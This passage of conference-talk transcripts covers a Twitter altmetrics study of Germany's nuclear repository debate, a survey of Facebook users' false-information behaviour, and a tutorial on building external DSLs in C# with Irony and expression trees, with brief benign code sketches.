For example, in the most prevalent of all categories that we coded, links to news articles or journalism. And there, of course, we could also find some cases of second order citations, like this tweet that references a news article on baer.de. And that news article would then, as it already says in the title, be about a newly published study. In this case, this was a study that was published around the time of data collection in Nature Energy. And to this particular study alone, we found seven links of this type in our randomly coded sample. OK, I think time is running a bit short. I will go quite quickly over the last example, which is that tweet embeddings would be another way for such a second order citation, as this example shows. So let me summarize some things we saw when characterizing this Twitter conversation around our use case, with this question in mind of where the conversations would link to research. First, we found the conversation to be dominated by relatively few very active accounts, which, as I said, was to be expected. What was less expected is that activity-wise, activism accounts or initiatives were, by far, the most active accounts, while journalism accounts were the most influential accounts follower-wise in our sample. Research institutes and researchers, on the other hand, seem to play a comparatively minor active role. Both automatic and manual searches for research mentions suggest that direct links to publications are very rare, is what we've seen, but, on the other hand, a surprisingly high amount of these second order citations were found. For example, a link to a news article which would then report on a scientific study, which would be used to infuse the results of this scientific study into the Twitter communication by linking to the news article that reports on it. To conclude, one intention of our study, as I mentioned in the beginning, was to get an impression of the suitability of Twitter as a platform to see whether this selection process behind the German repository search happens in a participatory and science-based way. Regarding this, I think the data goes both ways, actually. First, the diversity of represented roles that we saw in our sample, and especially the high degree of initiatives and activists, I think suggests that at least this conversation did not take place in a closed ivory tower of academics and technocrats, but did involve committed citizens on a substantial level. Also, we found these surprisingly many second order citations to processed research results, despite the at first glance small amount of direct references to research articles. On the other hand, we did not see much of an exchange around scientific findings. What I mean by that mainly is that most of those references we found went to very few and the same studies again and again. And, last slide, I think this has interesting implications for altmetrics, because what this clearly demonstrates is that in our case, if we would have measured the influence of research articles by counting links to, for example, the journal article landing pages, or even by counting the occurrences of their persistent identifiers like DOIs, we would have greatly underestimated the true visibility that some articles had in these conversations, which we only saw because we resolved and processed the contents behind the links in the tweets.
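A hedged sketch of the "resolve and inspect" step mentioned above: follow the, often shortened, link from a tweet to its landing page and check whether that page itself points to a scholarly source. In the study this coding was done manually; something like the snippet below could at most pre-filter candidates, and the publisher patterns are arbitrary examples.

import re
import requests

DOI_OR_PUBLISHER = re.compile(
    r"doi\.org/10\.\d{4,9}/[-._;()/:A-Za-z0-9]+|nature\.com|springer\.com",
    re.IGNORECASE,
)

def looks_like_second_order_citation(url: str) -> bool:
    # allow_redirects follows t.co and other shorteners to the final page
    resp = requests.get(url, timeout=10, allow_redirects=True)
    return bool(DOI_OR_PUBLISHER.search(resp.text))

# print(looks_like_second_order_citation("https://t.co/..."))  # placeholder URL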
And as especially, news articles seem to be such a popular way of introducing scientific findings and thoughts into Twitter conversations by linking to the news articles. For me, this raises the question whether news mentions might actually be better as an altmetric indicator at capturing what tweet mentions are often supposed to capture. It's mainly a question for the altmetrics crowd. And to close the talk, a brief outlook and mention of some limitations that might be less obvious. So what remains to be done is to extend this coding definitely to larger samples. As often with qualitative coding, this, of course, takes time. Another interesting addition, I think, to these examinations would be network analysis of the conversation participants. And one limitation that also has to be mentioned that might not be clear is that previous research has shown that this debate on nuclear energy varies greatly from country to country. And example for this is that in the US, for example, nuclear energy is quite frequently considered to be a very green, sustainable form of energy. Ah, yeah, last sentence. And I think for most Germans, this might be different. This is the view of most Germans. So the findings of the study presumably cannot be transferred to the discourse in other countries. Thank you very much. And I'd be happy for any comments or questions in English or, of course, German, too.
The search for a final nuclear repository in Germany poses a societal and political issue of high national medial presence and controversy. The German Repository Site Selection Act demands the search to be a "participatory, science-based […] process". Also, the repository search combines numerous scientific aspects (e.g., geological analyses, technical requirements) with broad societal implications. For these reasons it constitutes a promising background to analyze the general public's habits regarding referencing research on Twitter. We collected tweets associated with the conversation around the German nuclear repository search based on keywords. Subsamples of the resulting tweet set are coded regarding sending users' professional roles and types of hyperlinked content. We found the most vocal group participating in the conversation to be activists and initiatives, while journalists constituted the follower-wise most influential accounts in the sample. Regarding references to scientific content, we found only very few cases of direct links to scholarly publications. Exchanges of research findings however appear to have happened rarely and been limited to very few particular studies. The findings also illustrate a central problem regarding the expressive power of social media-based altmetrics, namely that a large share of signals indicating a scholarly work's influence will not be found by searching for explicit identifiers.
10.5446/52967 (DOI)
Thank you. I hope everyone can see my slides. Again, my name is Thomas Schmidt from the media informatics group of the University of Regensburg and I will report on a project for a paper called "Information behavior towards false information and fake news on Facebook: the influence of gender, user type and trust in social media". The origins of this project are situated in a seminar course in information science taught by David Elsweiler, so you can say it's some sort of collaborative project between information science and media informatics here in Regensburg. The other authors are Elizabeth Salomon, David Elsweiler and my supervisor, Christian Wolff. So without further ado, I will go into the introduction. As early as 2014, false information and fake news on social media has been considered a hot topic. The World Economic Forum called the rapid spread of misinformation online one of the top 10 trends of 2014, as you can see. And in my personal impression, I would say with the recent American presidency it became a dominant topic in the media, and especially nowadays with the COVID pandemic, it's an even more dominant topic in everyday society. And some examples: these are just some articles I found recently in the New York Times talking about the problem of fake news in the context of older adults. Another example from a German outlet talking about the problems of fake news in the context of the Corona pandemic. So this is a big topic that is talked about in society in general. And of course, it is also a very important topic that gets attention from the scientific community. You will find a lot of theoretical work trying to build taxonomies of what is misinformation, what is disinformation and so on. In a famous Science publication, the researchers were looking at how rumors and false information are spread on social media. If you have visited any sort of text mining conference or NLP conference, you will always find some tracks nowadays dealing with the automatic prediction or analysis of fake news on social media, or workshops on fact extraction and verification as you can find here. So this is a big topic. And of course, information science is also dealing with this topic. Specifically in the realm of information behavior, researchers look at how people interact with and share false information, how they perceive false information, and other factors. One particular research area that we are also situated in is the analysis of individual person related factors in the consumption of and interaction with false information on social media. So are there some person related factors that change the way people interact with false information? This is of course an interesting topic if you want to holistically understand false information behavior itself. As early as 2009, researchers were looking at factors like the user type, so how active someone is on a specific social media outlet, how intrinsic and extrinsic motivation influence the behavior, and other factors. Some classics in individual factors and information behavior: gender, personality. And of course, we also talked at this conference a lot about information literacy, and as you can assume this is also a factor that you might imagine has some influence on the way people interact with false information online. Most of the studies are either international or America focused.
We personally conducted a study that is purely focused on Germany and the interaction with false information by Germans on social media. So if you want to conduct a study specifically for Germany to analyze some of these factors, you have to talk about Facebook as the biggest social media outlet. It's still the most popular social media outlet in Germany. Twitter has gained some popularity with the recent American presidency and its dominance in the media, but it's still just a niche, so to speak, in the general public. So we focused our analysis on Facebook and on information behavior on Facebook. And to explore this topic in a first pilot study, we decided to perform a questionnaire study, a survey study, and we deemed this fitting to find first quantitative results that might lead us into novel directions to access this topic. What are the variables that we are interested in? Again, our focus actually lay on these person related factors. So we were interested in gender in the biological sense, just because it's such a big topic in individual factors of information behavior, but also in the factor Facebook usage and user type. So how actively are you using social media? Does this influence in any shape or form how you interact with false information? A more abstract factor that we also deemed interesting was trust in social media. It seems like an educated guess that the more you trust social media, the more you might change your behavior towards interaction with false information. These are the three factors we focused our analysis on. And what do we mean when we talk about false information behavior? I will outline the specific questions we used to measure these variables later on, but on a more global level, we are interested in how people handle false information. So how do they think they consume false information? How do they think they share false information, and so on? From an information literacy perspective, how do they verify information if they deem it false? And how do they actively react to false information? So do they report false information? Do they like or comment on false information? And so on. Yes, I will talk about the variables in more detail in the upcoming slides. Again, this is a questionnaire based study. The questionnaire is rather long and also a bit complex, I would say; scales are switching every now and then. It consists of 42 items and you can think about the questionnaire as a list of items that are clustered to summarize some of the variables aforementioned. So you have a list of items that aim to measure and operationalize Facebook usage intensity and another cluster to measure verification of false information. And I will look at these items in detail in the upcoming slides. Since the questionnaire was rather complex, we conducted various pre-tests with small sample sizes, which were quite important to guarantee the understanding of the questionnaire. And we acquired participants via general Facebook groups on Facebook. So participants had to be Facebook users of some sort. They had to be from Germany, and we posted it in Facebook groups that were focused on the acquisition of quantitative data for questionnaires, which is to some extent also a small problem. Overall, we collected data from 119 persons. But since these platforms, or these groups, are actually really focused on students trying to acquire participants for their studies, our sample is very focused on students of the age group of 21 to 27.
So instead of showing the questionnaire in detail, I will try to spare some time by just focusing on the results and talking about the structure of the questionnaire during the results, so to speak. I will not talk a lot about gender because we didn't find any interesting results in this context and no significant results. And overall, which is a bit discouraging to some extent, the influence suggested by the title of our paper turned out to be rather limited: we didn't find a lot of results showing interactions between these variables. But I would argue that some of the descriptive results we found are quite interesting. So don't question too much that I will talk a lot about descriptive results now in the beginning. We will later on talk a bit about interactions between these variables, but we just didn't find a lot of results there. So I will start with Facebook usage. Again, we tried to find a variable to measure the intensity of active Facebook usage. We didn't invent any parts of our questionnaire ourselves. We actually took some more or less validated questionnaires from other research areas and adjusted them to our specific use case. For the Facebook usage, we used a questionnaire that is used in psychology to measure daily media usage, but also other addiction types, and is adjusted every now and then. And we used it for Facebook specifically. So we adjusted the questions. You have a scale that is not really metric or ordinal at all, but is some sort of frequency scale to measure how often you use something. We identified certain Facebook activities that we wanted to include in this questionnaire, so things like updating your status, general browsing, reading posts, some active and some passive activities, and we summarized all these results in an overall variable called Facebook intensity, which we later on actually use to measure the Facebook usage in significance tests. So I will go into the results of this part of our questionnaire right away. Don't be discouraged by this large table. I will focus on the important results. It's a bit hard to interpret the results since the scale is a bit different, but overall, we find an effect that is rather well known in social media research and in research on collaborative media overall, which is that Facebook is mostly used in a passive way. So people use Facebook to browse in a passive way, read posts and so on, and only rarely do users use Facebook in some sort of active way by really posting something, commenting on something and so on. This is rather well known, but it is some sort of statistical problem for us if we want to find differences between these, you can call them, poster and lurker groups. Overall, the Facebook usage is, so to speak, rather low or mediocre. You have a lot of people that use it very passively and few people that use it very actively. This is not something super novel for us. The more abstract analysis concerning trust in social media is a bit more interesting. Again, we used a questionnaire from another field of research, a scale to measure consumer skepticism toward advertising, and transferred it simply to social media, or in this case Facebook. You have certain questions that you give your affirmation to on a scale from one to five. So in this specific case, you get asked if you find social media informative, truthful, reliable, accurate and essential. We sum these values up to get an overall measurement for trust in social media.
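A minimal sketch of how an item cluster like the trust scale above can be collapsed into one score, assuming the answers already sit in a pandas DataFrame with numeric codings; the column names and values are invented, and the Cronbach's alpha check is a common add-on, not something the talk claims was done.

import pandas as pd

answers = pd.DataFrame({
    "trust_informative": [4, 2, 3],
    "trust_truthful":    [3, 2, 2],
    "trust_reliable":    [2, 1, 2],
    "trust_accurate":    [3, 2, 3],
    "trust_essential":   [4, 3, 2],
})

trust_items = [c for c in answers.columns if c.startswith("trust_")]
answers["trust_in_social_media"] = answers[trust_items].sum(axis=1)

# Cronbach's alpha as a sanity check that the items form one coherent scale.
item_var = answers[trust_items].var(axis=0, ddof=1)
total_var = answers["trust_in_social_media"].var(ddof=1)
k = len(trust_items)
alpha = k / (k - 1) * (1 - item_var.sum() / total_var)

print(answers["trust_in_social_media"].describe())
print("Cronbach's alpha:", round(alpha, 2))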
Looking at these specific results in a descriptive way, we did find a low to mediocre overall trust in social media. The lowest value is found for the statement "social media is reliable", the highest value for the statement "social media is informative". Overall, our specific sample seems to be a bit skeptical of social media and to have a mediocre trust in, respectively a mediocre skepticism towards, social media. Looking at the concrete topic of our paper, the interaction with false information: again, it was the same questionnaire type as for the Facebook intensity. We just adjusted the questions to false information, but the measurement scale was the same. So the results are quite comparable. We looked at the question how many times people perceive they consume false information and share, comment on and like false information. Again, if we look at the statistics for this, we also find something that has been shown in other research, which we can indeed verify here for Germany as well. People assume, or at least they say, that they consume false information quite frequently. It's a bit hard to transfer these numbers, but the value four is something like multiple times a month. But when it comes to active interaction with false information, they think they do not interact at all with false information. So they don't think they share this false information. They don't think they comment on or like or do anything with false information. So very low values throughout for this topic. When we looked at what tactics people apply to verify information, we used a questionnaire part by Flanagin and Metzger. They designed a questionnaire in psychology to study the credibility of information, and we could basically just take this questionnaire; we removed some questions that just didn't make any sense in the context of Facebook, but other than this, it's quite the same. You can see various types of ways to verify information, like checking the page itself, the credentials of the poster, using other information sources. Looking at these results in detail, we identified that the verification strategies seem to vary quite largely among the participants. So the most frequent verification strategies are indeed to use other information sources and to check the comments of the Facebook post, and on a more abstract level, to check if the information is an objective statement or an opinion. But the values and the distributions of the selection of these items are quite similar. So every one of these tactics is chosen by some participants, most frequently the use of other information sources. When we talk about the reaction to false information, what we mean are the different possibilities you have to actively interact if you encounter false information on a social media platform, or Facebook specifically. Nowadays you can report a contribution on Facebook directly to Facebook as false information. You can even more actively try to comment on the post and say that this is false information, or you can share it. What we did identify, however, is that these kinds of active interactions with false information are something people rarely to never do, or at least they report to never do it. The only thing they do is that they unsubscribe from the poster, rather occasionally on average. This is of course kind of discouraging, as they wouldn't interact with a function like reporting the post, which is rather easy on Facebook and also works anonymously.
Instead they tend to react only with a rather passive activity, which is of course a problem for the detection of false information on Facebook's side. Now to the actual title of the paper, the interaction effects between the person-related factors and the dependent variables. We performed statistical tests for all the variables and questionnaire items. Since we analyzed a lot of research questions, we had to apply a correction to the significance level, which we did, so the p-values I report are corrected. Again, gender did not show any significant differences, and overall we did not find many interactions or relationships. So for our sample we did not find that the person-related attributes are an important predictor of false-information behavior as measured by our instruments. The things we did find — and I will report them nevertheless — are to some extent trivial and intuitive. For example, Facebook intensity: the more active you are on Facebook, the more you seem to trust Facebook and social media, which sounds intuitive. The more active you are on Facebook, the more you also seem to actively engage with false information — sharing, commenting on and liking it, at a moderate level — which also sounds rather trivial, but is interesting at the same time. Concerning trust in social media as a factor that might influence how you interact with false information, we again did not find many significant results. One significant correlation we did find was with a specific verification activity, namely checking the comments of a post to identify whether it contains false or true information. That also sounds fairly intuitive: if you trust social media more, you probably trust its participants more, and therefore you trust the comments more — that would be my explanation. So to summarize: we did not find what we were actually looking for, person-related factors as an influence on false-information behavior. Nevertheless, we did find some interesting results, some of which confirm previous research: participants think they consume false information, but they do not think they take part in its distribution in any way. The more active a user is, the more likely she or he interacts with or reacts to false information. A bit of a problem is that even when people encounter and identify something as false information, they do not seem to want to report it; they just passively unsubscribe from the poster, and that is the most frequent activity. This is of course in line with the simple fact that most people use these platforms passively, so the group that would report such content — the active posters — is rather small. The study of course has some rather clear limitations. The sample size is limited; we were mainly able to recruit students, which is a limitation, although on the other hand the age group from 20 to 27 is also the largest group on Facebook, so you can work with this data to some extent. And what I really want to point out is the subjectivity that is inherent in a questionnaire study: we did not measure how often people really encounter false information, we only measured what they perceive to encounter.
We also have the over-representation of students, and the problem — which was also a statistical problem — that the majority of Facebook users is rather passive. We had some open-ended questions to gather qualitative feedback, for example on what other verification strategies people use, but these open-ended questions were barely used; the questionnaire was long enough as it was, and I think people were too exhausted to also answer qualitative questions, so there was little point in analyzing them. So despite these limitations, I think there is a lot of future work that can build on them. Thank you for your attention — I think I stayed within the time frame — and I am looking forward to your questions.
In this paper, we present a survey study with 119 participants conducted in German, which investigates respondents’ Facebook behavior. In particular, the survey provides insight into how the individual factors gender, user type and trust in social media influence information behavior with respect to false information on Facebook. Our participants’ Facebook use is predominantly passive, the trust in social media is mediocre and most users claim to encounter false information on a weekly basis. If the truthfulness of information is verified it is mostly done by checking alternative sources and for the most part, users do not react actively to false information on Facebook. Of the different categories of Facebook users studied, more active and intensive users of Facebook (posters and heavy users) encounter false information the most. These users are the only user group to report posts with false information to Facebook or interact with the post. Participants with higher trust in social media tend to check the comments of a post to verify information.
10.5446/14064 (DOI)
Good. Okay, my mic is on, it seems. Hello everyone, my name is Jimmy Bogard, and this afternoon I'm looking at building external DSLs. I first got introduced to external DSLs on a project that — like any project that goes on long enough — eventually had to have some kind of rules engine. That seems to be inevitable in enterprise software: if it's around long enough, the users will want some infinitely customizable thing and say, we need a rules engine that can do whatever we want; we don't want you to code anymore, we'll have the rules engine do what we need, and you can just build that rules engine for us. And that's where I first ran into external DSLs: we needed something the user could type in, and we had to take whatever they typed and build executable code from it. To give you an example of what we're shooting for, I've got a simple demo of using a DSL. Can everyone see this okay? On the first tab I have something very simple, just a calculator — not the most exciting thing in the world, but it shows there's something going on behind the scenes. I add two numbers, one plus two, and it gives me the result three. Not very exciting, right? I can make it more complicated, like (one plus two) times three — that's nine. Now what happens when I take the parentheses away? Seven. What's going on behind the scenes is that we take the text someone typed in, parse it, and then build code on the fly to evaluate the result as dynamically compiled code. We're not farming the calculation out to the Windows calculator; we're actually taking that text, parsing it, and doing something with it. But typically I don't write calculators in my applications — typically it's something more dynamic, like rules. In this example we have a user interface where you can type in some user information — first name, last name, and an age — and then you can put in dynamic matching rules, something you can type in that decides whether a person matches. For example, say the age has to be greater than five — we don't want anyone in our system to match if they're younger than five. Right now their age is zero, so I guess they're not born yet, and when I evaluate it, it says not a match, which is good so far. Bump the age up to six, and of course it now says match. For a very simple expression like this — one value, an operator, another value — it's pretty easy to design a user interface: maybe a drop-down for the field, a drop-down for the operator, and a box to type in a number. But what happens if they want to do something more complicated, with logical operators like and or or? Say the age is greater than five and the first name is John. If I evaluate this, it says not a match, and of course if I go and type in John now, it says it is a match.
This is where we start to see DSLs really come into play: something very dynamic that the user can type in, but that a user interface can't really capture. Has anyone seen a user interface that tries to do something this dynamic, where you have to click and drag and drop things around? Or where an "and" is actually a visual grouping, but then you have "or"s in there too, and you're left wondering, is a grouping automatically an and, or is it an or? How do these things fit together? Eventually the user just says, I really need something like Excel, where I can type things in and that's how my rules get evaluated — don't try to come up with some crazy interface on top of it, just give me something I can type in. So when you have something dynamic like this, that's where DSLs come into play: something the user can type freely, and behind the scenes it's evaluated against whatever business objects I've defined for this user interface. Before we see what went into building this, I want to take a few steps back and walk through what a DSL is, how it's built, and the building blocks we use to get to the point where someone can type in whatever they want and we evaluate that dynamic expression. Never good switching back and forth — someone told me to just use Keynote, but even though this machine says Apple on it, it's running Windows, so what are you going to do? So, what a DSL is: it's composed of three parts. One, it's a computer programming language, so people can do some sort of programming with it. Two, it has limited expressiveness — I'm not trying to provide a full programming language with functions and methods and variables and so on. And three, it's focused on a particular domain: I'm building this limited-expressiveness language for a very particular use. There are two types of DSLs out there. The first kind is the internal DSL — if anyone recognizes this, it's a Fluent NHibernate example of an internal DSL. They're called internal because they're written in a general-purpose language; in this example it's written in C#. An internal DSL uses a subset of the language's features: I'm not using everything built into C#, only a very targeted, limited scope based on what I've exposed through the DSL. These are also called fluent interfaces — method chaining and the like — which make configuration a lot easier to read than, say, XML. And they're built to handle just one aspect of the overall system: in this case I don't program my entire application in Fluent NHibernate, I only program the piece that configures the ORM mapping layer, and that's it. Typically these are written in languages like Ruby, C#, or Boo — regular programming languages, of which I use only a very small slice.
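To make the internal-DSL idea concrete, here is a minimal sketch of a fluent interface in C#. This is not Fluent NHibernate's actual API — the class and method names are made up for illustration — it just shows the method-chaining style being described:

```csharp
using System;
using System.Collections.Generic;

// A tiny, hypothetical fluent configuration builder (names are illustrative).
public class MappingBuilder
{
    private string _table = "";
    private readonly List<string> _columns = new List<string>();

    // Each call configures one piece and returns 'this' so calls can be chained.
    public MappingBuilder Table(string name)  { _table = name; return this; }
    public MappingBuilder Column(string name) { _columns.Add(name); return this; }

    public override string ToString() => $"Table {_table} ({string.Join(", ", _columns)})";
}

public static class FluentDemo
{
    public static void Main()
    {
        // Reads almost like a sentence, but it is ordinary compiled C# --
        // change it and you have to recompile, which is the point made above.
        var mapping = new MappingBuilder()
            .Table("People")
            .Column("FirstName")
            .Column("LastName")
            .Column("Age");

        Console.WriteLine(mapping);
    }
}
```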
Now this is the kind of thing coders can write — developers can author it — but it's not something I can expect someone from the business to do. They're not going to open Visual Studio; they're not going to know, oh, I need a curly brace there, oh, you need a semicolon there, oh, that little colon makes it inheritance. Even for our rules engine case, there were C#-based rules engines out there, but all the ones we found still forced you into an interface where you had to write C#. That's not something our users were going to do — they're not coders. They have experience with things like Access and Excel, so they have some ability to write expressions, but they won't understand that it didn't compile because the lambda operator wasn't right. So internal DSLs are targeted at developers. The other thing we find with them is that they're very static in nature, because this is C# code that gets compiled with the rest of my code. It's not like I can deploy to production and then go change a mapping or add a new rule — the code is compiled. You could do some dynamic compilation tricks, but that's kind of crazy and a little silly; there's no real point in doing something like that. So while internal DSLs work great, especially for configuration, when the audience is a coder, they're horrible when the audience is a non-coder. For that, we have the concept of external DSLs. In this example it's — gosh — NAnt. I hope no one still uses Ant or NAnt these days; I've moved on to greener pastures. In an external DSL, the language is actually separate from the main language of our application. Even though our application is written in .NET, and even the runner behind NAnt is .NET, this is not .NET — it's XML. An external DSL is always written in a language separate from the application it works with. There's typically a custom syntax, although it can borrow from something existing, so you don't have to invent something completely new. Here the syntax is XML because, hey, I don't have to write a parser for it — there are freely available XML parsers out there, it has a very well-defined syntax, and I don't have to invent a new markup language. And typically we see external DSLs parsed in the host language using a number of parsing techniques; we'll dig into those in a bit — how to take raw text and be able to reason about it and do something with it. External DSLs are really good for non-coders — although non-coders are probably not writing NAnt scripts. But if we have something like the text rules engine we saw earlier, there's nothing in that interface that says you must be a coder to write "age is greater than five". In fact, whether we use a greater-than sign or the words "greater than" is something we get to choose. The idea is that the audience is a non-coder, or that the thing needs to be more dynamic in nature and not get compiled along with the rest of my application.
So in this case, NAnt itself is already compiled, but it uses this text input to drive executing builds — compiling, running tests and so on. I don't have to compile anything for it to change; if I want it to do something else, I just edit the text file and run it again, while the NAnt code stays compiled. Whereas in the earlier Fluent NHibernate example, if I change anything in that file, I have to recompile the entire application. And when you deploy an application, it matters whether they can change this after it's been deployed. Looking at the processing pipeline — how to take this text and, in our example, end up with actual executing code — there are two main steps. We start with some sort of DSL script on one end, and on the other end we have executable code, and in between we use a couple of techniques to take that raw text and do something with it. First we have to parse the raw text in some meaningful way. If it's XML, that's pretty easy: we use whatever library comes with the framework we're using, and the parsed XML gives us something we can walk — XML APIs have knowledge of elements and attributes, so if I want to know the target names in that NAnt example, it's easy to find out. Now, if I don't want XML and I want custom text like we saw, then I have to pick something for this middle step. For very simple external DSLs, people typically just hand-roll a parser — regular expressions or plain string manipulation. But what we saw had arbitrary complexity: we started with a simple Boolean, this greater than that, but then we kept adding on — and this other thing, and more parentheses and logical operators — and it can get as complex as the user wants. Regular expressions are not going to work well for something like that. Once we see that additional level of complexity, that "the user can do whatever they want" situation, we stop hand-rolling and use a real lexer-parser, a tool built for this specific task. The typical tools out there, mostly from the compiler world, are yacc — I don't even know what it stands for — ANTLR, which is a really common one in the Java community, and the one we're going to be looking at today on the .NET side, which is called Irony. There are also language workbenches, where you visually design what your language is supposed to look like — Microsoft had a project a few years ago that went through numerous revisions and eventually got cancelled, trying to do something like that — or we can just use one of these off-the-shelf tools.
I think some of these are not free, but some of them are. Now, what these tools are typically used for is building compilers — defining what a programming language is supposed to look like, and then taking that and going off to compile it. I'm not building a whole programming language, but these tools are really good at simply parsing text, so people also use them as general-purpose parsers. And I don't really know the difference between lexers and parsers, so if someone out there wants to make me look dumb, go ahead and yell it out; otherwise, to me it's all one thing. If you look at our original text, we had something very simple, like 1 plus 2. I want to take this text and reason about it, because what I eventually want to do behind the scenes is recognize that someone is trying to add two numbers: this is the first number, this is the second number, and the thing they're trying to do is add. So I need to be able to look at this and know that these two are numbers, the left and the right, and the thing in the middle is an operator, a plus, and then take those pieces and do something with them. Parsing lets me take that text and get that information out of it in an easy way. The next step, once we're able to parse it, is to put it into a model that makes sense for the application. Looking at 1 plus 2, on the left there's a number and on the right there's a number — I don't need "a one" and "a two" as separate concepts, it's just a number — and the thing in the middle is some sort of binary operator, in this case add. So I can build a tree that represents trying to add two numbers: an add node at the top and two child nodes representing the numbers being added. This structure is commonly known as an abstract syntax tree, and it's typically the output of the lexer-parser step: lexing and parsing build up this tree of nodes that represents what the user typed in. Once I have this tree, I can do whatever I want with it — these are just regular objects in whatever library I'm using. If I want to print them back out on the screen, I can walk the tree and do that. If I want to take them and build SQL from them, I can do that. If I want to build dynamically executed code, I can do that as well. But I need a model that defines what this looks like. Typically the lexer-parser tools have one generic node type that represents a piece of the tree, and then they let you define custom node types so you can reason about the tree more cleanly. For example, with an add node I always know there are exactly two things being added, so I can define members on it for the left and the right, as opposed to having to dig around in a generic collection of child nodes.
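As a rough illustration of the kind of node model being described — these class names are made up for the sketch, not Irony's built-in types — an abstract syntax tree for a tiny expression language might look like this:

```csharp
// Hypothetical AST node classes for a tiny expression language.
public abstract class AstNode { }

// A terminal: a leaf that just carries a value, e.g. the numbers 1 and 2.
public class LiteralNode : AstNode
{
    public object Value { get; }
    public LiteralNode(object value) => Value = value;
}

// A non-terminal: "left <op> right", e.g. 1 + 2 or $Age > 5.
public class BinaryNode : AstNode
{
    public AstNode Left  { get; }
    public string  Op    { get; }
    public AstNode Right { get; }

    public BinaryNode(AstNode left, string op, AstNode right)
    {
        Left = left; Op = op; Right = right;
    }
}

// Example: the text "1 + 2" would be parsed into
//   new BinaryNode(new LiteralNode(1), "+", new LiteralNode(2))
// -- an add node on top, two literal leaves below.
```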
The other thing these lexer-parsers force you to define is which places in the tree can branch off into additional nodes and which places are the end. In this case the add node is what's known as a non-terminal, and the literal — the blue one on the slide — is known as a terminal, because it ends. Non-terminal, terminal — it will make more sense when we actually see how to configure these things. Now that we have our object model parsed out, we can take it and do something with it, and typically this is the step where we generate the target code. For us, I want to execute C# code on the fly based on what someone typed in: in the calculator case, for 1 plus 2, I want to actually execute C# code that is 1 plus 2. With later versions of C# and .NET that was made a lot easier, because they introduced the concept of expression trees. So in the generate step we walk the tree recursively, one node at a time, and at each step we translate the abstract syntax tree built by the parser into a C# expression tree, which can then be compiled on the fly and executed at runtime. That's really the magic behind this whole thing — the ability, in C# at least, to dynamically compile and run code built from an expression tree. Something C# doesn't have very well right now is the ability to just type in C# and say, execute that; there are some ways to do it, but there's no real REPL or anything to type things in directly. Instead we have this expression tree thing, which is like a limited C# compiler — limited functionality, but it gets the job done of adding two numbers. We can also do something else in the generate step. In the actual project this whole talk comes from, we had multiple targets for our DSL: we had to generate executable C# code that ran against regular .NET objects, and we had to take the same user input and generate the correct SQL behind the scenes so it could go in a WHERE clause. So I could either evaluate my matches on the client side, in our thick-client application, or on the server side in SQL itself. Having one model that could go in both directions made that a lot easier — I don't have to reinvent parsing every single time. We also had things like type checking: if it's supposed to be an expression that evaluates to true or false, make sure it actually does. If they typed 1 plus 2, well, this isn't JavaScript — that's not truthy or falsy, it's a number — so we needed to be able to say, we actually need a Boolean here and you typed in a number, so that's not going to work. All of that can be done as long as we have this nice semantic model to work from, the abstract syntax tree. The tool we're going to use to build our external DSL is called Irony. Irony lets you build lexer-parsers in C#: you build a class that represents your language, and Irony runs that definition against any arbitrary text to give you a syntax tree behind the scenes.
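To show the "compile on the fly" part concretely — this is standard System.Linq.Expressions usage, independent of the talk's own builder class — turning 1 + 2 into executable code looks roughly like this:

```csharp
using System;
using System.Linq.Expressions;

public static class ExpressionTreeDemo
{
    public static void Main()
    {
        // Build the tree for "1 + 2" by hand: two constant leaves and an Add node.
        Expression left  = Expression.Constant(1);
        Expression right = Expression.Constant(2);
        Expression body  = Expression.Add(left, right);

        // Wrap it in a parameterless lambda and compile it into a real delegate.
        Func<int> func = Expression.Lambda<Func<int>>(body).Compile();

        Console.WriteLine(func());  // prints 3
    }
}
```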
You could use this tool just like all the other lexer-parsers out there to build your own programming language, but I'm not trying to do that. My users don't want to build their own programming language; they just want to type in something that evaluates to true or false, and that's it. The good thing is that tools like Irony handle that fine: they can describe very simple languages or very complex ones, and it's really up to you how much you put in there. When we looked at this, we did evaluate whether we could skip the whole parsing and lexing step — no trees, no custom compilers — and just use something like Ruby or Boo, because those have very rich language features that let you manipulate things and do things dynamically. What we found is that if I start from something like Ruby or Boo, I can't really subtract features out of the language. I can't say: you can't import modules, you can't write functions, you can't write classes, you can't monkey-patch things, but you can write this really simple stuff here. It doesn't work that way — you can't pare languages down, you can only build them up. That's why we went with a custom lexer-parser: we wanted to build up exactly what was available for the users to use, rather than removing things and then having to check whether they used something they shouldn't have. The other thing we saw was that with a tool like this we stay completely inside the environment of the framework we're running on, which is .NET. With Ruby or Boo I'd have to work through their compiler to figure out what the user actually typed, and we wanted to translate to multiple targets — SQL and .NET — from one single piece of text. That's harder to do when you have to work through someone else's parser and someone else's compiler. So instead we just used an off-the-shelf lexer-parser, in this case Irony, and went from there. So let's look at the demo to see how we built our Excel-like magic, where I can add numbers and execute custom rules. Any questions so far? Can everyone see this okay? One of the first things we worked on was identifying what the users were actually going to type in. We didn't really want to invent a new kind of language. For example, we knew we were already going to be targeting SQL, so we didn't want to invent new operators — instead of a less-than sign I didn't want the user typing the words "less than"; there was just no value in that for them. So what we did was look at an existing language, in our case SQL, and strip out the parts we didn't want, to arrive at our actual expression language. What we're looking at here is the definition of SQL in a format known as Extended Backus-Naur Form, EBNF. We're not going to go deep into that here, but it's basically a way of describing how a language is built up, and this text can actually be fed into tools that support it.
ANTLR in the Java world, for example, supports a version of this notation and can build the parser and the node types on top of it. In this SQL grammar we find rules like: a query is an alter, a create, a delete — all the CRUD stuff — a select or an update, and further down it defines what an alter statement is. But again, I'm not recreating SQL; I only really want the expressions, so let me scroll down to those. Okay, here we go. This is the EBNF definition of expressions in SQL. It starts with a generic definition: there's a thing called an expression, and an expression is defined as an expression AND another expression, or an expression OR another expression, or just an expression by itself. And it keeps going down: AND is defined, NOT is defined, the predicate expressions are defined, the logical operators like IN, LIKE, greater than, less than — all the way down to what a value can be: an identifier, an integer literal, a real literal, a string literal, or null. What you'll notice is that I can reference a named entity like "value" in one rule and then give its definition later on. That lets us have a very generic description of how things fit together and then define the specifics of the individual pieces separately. And for expressions we need arbitrary complexity — as many parentheses, ANDs and ORs as you want — so the definitions are recursive: eventually you get to the point where an expression list is either an expression, comma, another expression list, or just an expression. It becomes self-referential, which is exactly what allows arbitrary complexity. So we can start with this picture of what the syntax should look like and then go to the Irony version to see how it translates. For some external DSLs, if you don't need arbitrarily complex expressions, none of this matters much. But when we do have to support any number of additions, subtractions, multiplications and parentheses, it helps to have a starting point instead of making it up as we go. In Irony, to define how our language is built, we create a custom grammar class. Here I'm creating a new class called CustomDslGrammar that inherits from a special Irony class called Grammar, and inside the constructor I define what my language looks like. As we talked about earlier, the language has terminals and non-terminals: terminals are basically the leaves of the tree, and non-terminals are the nodes that have child 